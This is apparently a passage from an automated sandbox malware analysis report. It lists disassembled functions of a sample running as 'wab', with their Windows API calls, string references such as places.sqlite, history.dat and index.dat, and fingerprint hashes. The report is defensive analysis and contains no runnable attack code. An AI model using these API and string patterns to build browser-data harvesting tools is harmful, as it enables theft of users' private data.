                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                      • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                      • API String ID: 0-1445880494
                                                                                                                                                                                                                      • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1042154641-0
                                                                                                                                                                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2947809556-0
                                                                                                                                                                                                                      • Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                      • API String ID: 3093078384-467022611
                                                                                                                                                                                                                      • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 839530781-0
                                                                                                                                                                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID: *.*$index.dat
                                                                                                                                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3831604043-0
                                                                                                                                                                                                                      • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1631957507-0
                                                                                                                                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1161345128-0
                                                                                                                                                                                                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
